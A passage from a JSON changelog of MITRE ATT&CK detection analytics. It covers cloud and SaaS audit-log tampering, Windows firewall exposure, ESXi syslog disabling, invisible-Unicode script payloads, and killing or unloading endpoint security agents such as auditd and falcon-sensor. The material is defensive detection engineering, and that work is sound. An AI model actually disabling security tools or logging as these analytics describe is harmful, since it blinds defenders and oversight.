                            "name": "AWS:CloudTrail",
                            "channel": "ModifyInstanceAttribute"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--d2ff4b56-8351-4ed8-b0fb-d8605366005f",
                            "name": "AWS:CloudTrail",
                            "channel": "AuthorizeSecurityGroupIngress"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "CriticalTrailList",
                            "description": "Audit trails that must remain enabled"
                        },
                        {
                            "field": "ControlChangeWindow",
                            "description": "Time after suspicious API sequence to inspect coverage loss"
                        }
                    ],
                    "x_mitre_platforms": [
                        "IaaS"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--f46639b5-4d99-4d52-8da9-112a468cc6d8",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 17:10:51.287000+00:00",
                    "modified": "2026-04-24 20:33:44.123000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0900#AN2042",
                            "external_id": "AN2042"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2042",
                    "description": "Detects exploitation or abuse of SaaS security workflows resulting in disabled alerts, reduced retention, bypassed enforcement, role escalation, or tokenized persistence that weakens monitoring. Correlates unusual admin/API activity with visibility reduction.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "saas:okta",
                            "channel": "policy.rule.update;system.log.disable;admin.role.assign"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa",
                            "name": "m365:unified",
                            "channel": "Set-AdminAuditLogConfig;New-ApplicationAccessPolicy;ConsentToApplication"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "PrivilegedActorAllowlist",
                            "description": "Approved admins allowed to change controls"
                        },
                        {
                            "field": "RetentionChangeThreshold",
                            "description": "Minimum acceptable logging retention"
                        }
                    ],
                    "x_mitre_platforms": [
                        "SaaS"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--702db8b6-641f-4526-a0d0-a5a62c499508",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-16 17:34:13.876000+00:00",
                    "modified": "2026-04-24 20:32:08.148000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0901#AN2043",
                            "external_id": "AN2043"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2043",
                    "description": "Detects processes or users modifying Windows Defender Firewall profiles, policies, or rules followed by measurable network exposure changes. Correlates firewall management execution, registry/policy mutation, service state changes, and subsequent inbound or outbound connectivity inconsistent with baseline administration.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=1"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4688"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170",
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=13, 14"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--7f70fae7-a68d-4730-a83a-f260b9606129",
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=12"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--5297a638-1382-4f0c-8472-0d21830bf705",
                            "name": "WinEventLog:System",
                            "channel": "EventCode=7036"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=3, 22"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=5156, 5157"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "AuthorizedAdminAccounts",
                            "description": "Known administrators allowed to manage host firewall settings"
                        },
                        {
                            "field": "MaintenanceWindow",
                            "description": "Approved change windows where firewall modifications are expected"
                        },
                        {
                            "field": "ExposureCorrelationWindow",
                            "description": "Time window to correlate firewall change with new connections/listeners"
                        },
                        {
                            "field": "SensitivePorts",
                            "description": "Ports of concern such as RDP, SMB, WinRM, SSH, custom admin ports"
                        },
                        {
                            "field": "AllowedManagementParents",
                            "description": "Expected parent processes such as SCCM, Intune agent, GPO client"
                        },
                        {
                            "field": "RuleScopeThreshold",
                            "description": "Detect widening from subnet/local scope to Any/0.0.0.0/0"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--2b990a38-dedf-4a9a-9bd2-9a805c2f1b46",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-20 18:22:06.178000+00:00",
                    "modified": "2026-04-24 20:31:16.812000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0497#AN2044",
                            "external_id": "AN2044"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2044",
                    "description": "Detects esxcli commands disabling syslog, firewall, lockdown mode, or stopping hostd/vpxa; correlates command execution with reduced forwarding activity.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                            "name": "esxi:shell",
                            "channel": "esxcli system syslog config set/reload, services.sh restart/stop"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--66531bc6-a509-4868-8314-4d599e91d222",
                            "name": "esxi:hostd",
                            "channel": "service state change"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "ExpectedAdminIPs",
                            "description": "Authorized management sources."
                        }
                    ],
                    "x_mitre_platforms": [
                        "ESXi"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--360eb601-28db-4418-8474-ad2a432ce534",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-23 14:52:04.808000+00:00",
                    "modified": "2026-04-24 21:02:59.794000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0916#AN2059",
                            "external_id": "AN2059"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2059",
                    "description": "Much of this takes place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--3c500af0-d284-48c3-b23b-a22f8b77649d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-23 14:54:24.674000+00:00",
                    "modified": "2026-04-24 21:03:04.099000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0917#AN2060",
                            "external_id": "AN2060"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2060",
                    "description": "Much of this takes place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--33712883-6871-4147-8272-7cd1c6c64ad6",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-23 14:57:28.640000+00:00",
                    "modified": "2026-04-24 21:02:57.004000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0918#AN2061",
                            "external_id": "AN2061"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2061",
                    "description": "Much of this takes place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--255379f1-e115-4f3c-835a-23c8d279847e",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-23 14:58:44.065000+00:00",
                    "modified": "2026-04-24 21:02:46.916000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0919#AN2062",
                            "external_id": "AN2062"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2062",
                    "description": "Much of this takes place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "PRE"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--1a9f097a-d5b9-424d-ae20-19ed73eb9dcf",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-23 18:08:03.334000+00:00",
                    "modified": "2026-04-24 20:31:04.803000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0920#AN2063",
                            "external_id": "AN2063"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2063",
                    "description": "Detection identifies execution of scripts or files that appear visually benign (low printable character ratio) but result in runtime decoding, dynamic evaluation, and subsequent process or network activity. Correlation links script execution with abnormal Unicode density and follow-on behavior such as child process creation or outbound connections.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=3, 22"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=1"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "WinEventLog:Security",
                            "channel": "EventCode=4688"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd",
                            "name": "WinEventLog:PowerShell",
                            "channel": "EventCode=4103, 4104, 4105, 4106"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--2b3bfe19-d59a-460d-93bb-2f546adc2d2c",
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=11"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
                            "name": "WinEventLog:Sysmon",
                            "channel": "EventCode=7"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "AllocationSizeThreshold",
                            "description": "To tune for atypical virtual memory allocations that might indicate non-rendering characters in dense files"
                        },
                        {
                            "field": "ExecutionContext",
                            "description": "Allows tuning for atypical processes from script execution (e.g., powershell.exe, wscript.exe, mshta.exe)"
                        },
                        {
                            "field": "UnicodeDensityThreshold",
                            "description": "Tune for invisible characters, or atypical amounts of Unicode characters (U+...)"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--a32c4f38-feaf-4291-9dad-3043114b4d37",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-23 18:14:02.581000+00:00",
                    "modified": "2026-04-24 20:32:45.953000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0920#AN2064",
                            "external_id": "AN2064"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2064",
                    "description": "Detection identifies execution of scripts containing high concentrations of invisible Unicode characters followed by decoding or interpretation behaviors (e.g., base64 decode, eval) and subsequent process or network activity. Emphasis is placed on mismatch between file entropy/structure and execution output.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
                            "name": "auditd:SYSCALL",
                            "channel": "stat and lstat syscall results on files, including inode and permission info"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                            "name": "auditd:EXECVE",
                            "channel": "execve of script/interpreter (bash, python, node) with suspicious encoded or non-printable content"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "DecodeUtility",
                            "description": "May include base64"
                        },
                        {
                            "field": "EntropyThreshold",
                            "description": "Useful for tuning sections containing high entropy indicative of Unicode sequences"
                        }
                    ],
                    "x_mitre_platforms": [
                        "Linux"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--6195e912-ed73-4ec7-a03b-097631ec0b26",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-23 18:32:05.919000+00:00",
                    "modified": "2026-04-24 20:31:59.381000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0920#AN2065",
                            "external_id": "AN2065"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 2065",
                    "description": "Detection identifies execution of scripts or applications containing invisible Unicode payloads reconstructed at runtime, correlated with abnormal AppleScript, JavaScript for Automation, or shell execution and subsequent process or network behavior inconsistent with visible file content. ",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba",
                            "name": "NSM:Flow",
                            "channel": "log entries indicating network connection initiation on macOS"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                            "name": "macos:unifiedlog",
                            "channel": "Execution of osascript, sh, bash, zsh, installer, open"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71",
                            "name": "macOS:unifiedlog",
                            "channel": "looking for file access to scripts with abnormal encoding patterns"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "ExecutionContext",
                            "description": "Use of abnormal AppleScript or JavaScript functions (such as eval()) not typically expected"
                        },
                        {
                            "field": "UnicodeCharacterSet",
                            "description": "Specific unicode ranges monitored (zero-width, PUA, bidi) "
                        }
                    ],
                    "x_mitre_platforms": [
                        "macOS"
                    ],
                    "x_mitre_version": "1.0"
                }
            ],
            "major_version_changes": [],
            "minor_version_changes": [
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--bda03bab-3f0b-4bd0-8a8f-77bcb2b1ee7d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:33:02.253000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0497#AN1370",
                            "external_id": "AN1370"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1370",
                    "description": "Detects kill/systemctl/service commands against EDR, auditd, falco, osquery, rsyslog, journald, or agent processes; configuration edits disabling startup; module unload attempts; abrupt cessation of logs after privileged shell execution.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "auditd:SYSCALL",
                            "channel": "execve: systemctl stop, service stop, or kill -9 on security daemons (e.g., falcon-sensor, auditd)"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
                            "name": "auditd:CONFIG_CHANGE",
                            "channel": "delete: Modification of systemd unit files or config for security agents"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "AgentServiceNames",
                            "description": "List of endpoint protection service names (varies across deployments)."
                        },
                        {
                            "field": "AllowedAdminAccounts",
                            "description": "Accounts permitted to legitimately stop or reconfigure services."
                        }
                    ],
                    "x_mitre_platforms": [
                        "Linux"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:33:02.253000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Detects kill/systemctl/service commands against EDR, auditd, falco, osquery, rsyslog, journald, or agent processes; configuration edits disabling startup; module unload attempts; abrupt cessation of logs after privileged shell execution.\", \"old_value\": \"Detection of adversaries attempting to stop or disable host-based security agents by killing daemons, unloading kernel modules, or modifying init/systemd service configurations.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to63__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to63__0\"><a href=\"#difflib_chg_to63__top\">t</a></td><td class=\"diff_header\" id=\"from63_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Detection&nbsp;of&nbsp;adversaries&nbsp;attempting&nbsp;to&nbsp;stop&nbsp;or&nbsp;disable&nbsp;host-</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to63__top\">t</a></td><td class=\"diff_header\" id=\"to63_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Detects&nbsp;kill/systemctl/service&nbsp;commands&nbsp;against&nbsp;EDR,&nbsp;auditd,</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">based&nbsp;security&nbsp;agents&nbsp;by&nbsp;killing&nbsp;daemons,&nbsp;unloading&nbsp;kernel&nbsp;m</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;falco,&nbsp;osquery,&nbsp;rsyslog,&nbsp;journald,&nbsp;or&nbsp;agent&nbsp;processes;&nbsp;conf</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">odules,&nbsp;or&nbsp;modifying&nbsp;init/systemd&nbsp;service&nbsp;configurations.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">iguration&nbsp;edits&nbsp;disabling&nbsp;startup;&nbsp;module&nbsp;unload&nbsp;attempts;&nbsp;a</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">brupt&nbsp;cessation&nbsp;of&nbsp;logs&nbsp;after&nbsp;privileged&nbsp;shell&nbsp;execution.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
                    "id": "x-mitre-analytic--9e9a5111-038b-4c68-a8bc-6d094723def4",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2025-10-21 15:10:28.402000+00:00",
                    "modified": "2026-04-24 20:32:42.659000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/detectionstrategies/DET0497#AN1371",
                            "external_id": "AN1371"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Analytic 1371",
                    "description": "Detection of adversary disabling endpoint security tools by unloading launch agents/daemons, modifying configuration profiles, or disabling Gatekeeper/XProtect/logging settings, or removing endpoint agents followed by telemetry loss.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_log_source_references": [
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077",
                            "name": "macos:unifiedlog",
                            "channel": "Execution of launchctl unload, kill, or removal of security agent daemons"
                        },
                        {
                            "x_mitre_data_component_ref": "x-mitre-data-component--74fa567d-bc90-425c-8a41-3c703abb221c",
                            "name": "macos:unifiedlog",
                            "channel": "Modification of system configuration profiles affecting security tools"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_mutable_elements": [
                        {
                            "field": "DaemonNames",
                            "description": "Expected security agent daemons (e.g., com.crowdstrike.falcon.Agent)."
                        },
                        {
                            "field": "TimeWindow",
                            "description": "Detection correlation period for multiple security tool disable actions."
                        }
                    ],
                    "x_mitre_platforms": [
                        "macOS"
                    ],
                    "x_mitre_version": "1.1",
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-24 20:32:42.659000+00:00\", \"old_value\": \"2025-10-21 15:10:28.402000+00:00\"}, \"root['description']\": {\"new_value\": \"Detection of adversary disabling endpoint security tools by unloading launch agents/daemons, modifying configuration profiles, or disabling Gatekeeper/XProtect/logging settings, or removing endpoint agents followed by telemetry loss.\", \"old_value\": \"Detection of adversary disabling endpoint security tools by unloading launch agents/daemons, modifying configuration profiles, or using security/uninstall commands to remove agents.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
                    "previous_version": "1.0",
                    "version_change": "1.0 \u2192 1.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to57__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to57__0\"><a href=\"#difflib_chg_to57__top\">t</a></td><td class=\"diff_header\" id=\"from57_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Detection&nbsp;of&nbsp;adversary&nbsp;disabling&nbsp;endpoint&nbsp;security&nbsp;tools&nbsp;by&nbsp;</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to57__top\">t</a></td><td class=\"diff_header\" id=\"to57_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Detection&nbsp;of&nbsp;adversary&nbsp;disabling&nbsp;endpoint&nbsp;security&nbsp;tools&nbsp;by&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">unloading&nbsp;launch&nbsp;agents/daemons,&nbsp;modifying&nbsp;configuration&nbsp;pro</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">unloading&nbsp;launch&nbsp;agents/daemons,&nbsp;modifying&nbsp;configuration&nbsp;pro</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">files,&nbsp;or&nbsp;using&nbsp;security/uninstall&nbsp;commands&nbsp;to&nbsp;remove&nbsp;agents</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">files,&nbsp;or&nbsp;disabling&nbsp;Gatekeeper/XProtect/logging&nbsp;settings,&nbsp;or</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">.</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;removing&nbsp;endpoint&nbsp;agents&nbsp;followed&nbsp;by&nbsp;telemetry&nbsp;loss.</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-analytic",
